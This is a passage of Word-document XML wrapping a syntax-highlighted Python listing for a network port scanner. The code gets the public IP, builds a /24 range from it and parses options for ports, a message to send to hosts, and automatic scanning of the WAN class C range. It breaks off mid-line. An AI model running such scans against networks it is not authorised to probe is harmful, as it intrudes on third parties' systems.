        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">269  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>get_external_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">270  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">external_ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>urllib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>urlopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'https://ident.me'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>read</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271  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>external_ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">272  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">273  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">274  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Convert an ip to a CIDR / 24 range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">275  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_to_cidr24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_to_convert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">276  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">blist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_to_convert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># split bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">277  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>blist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'0'                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># changes last byte</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">278  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">cidr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'.'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">279  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">cidr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>cidr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>blist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># collect the bytes again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">280  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">cidr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'/24'                           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># adds mask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">281  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>cidr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">282  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">283  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">284  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Parse command line parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">285  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parse_params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">286  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">parser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>argparse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ArgumentParser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2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287  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>epilog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'You can also use it to scan specific ports on a network.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">288  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-r'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--ran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41"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">289  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Specify the network range in CIDR format. ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">290  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'If not provided, an attempt is made to autodetect a local class C range. ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">291  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Example: 192.168.1.0/24'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">292  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-w'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--wanauto'</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293  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'If this option is set (and no -r has been specified), ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">294  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'an automatic class C range will be set for the current Wan IP.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">295  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-p'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--ports'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>nargs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'+'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>list</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6  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Specify a list of ports to scan. Default value: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</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7  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-m'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--messa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11"/>
        </w:rPr>
        <w:t>MAGIC_MESSAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">298  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Message to send to host. If empty (-m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>\'\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">), then not message is sent. Default value: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">299  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
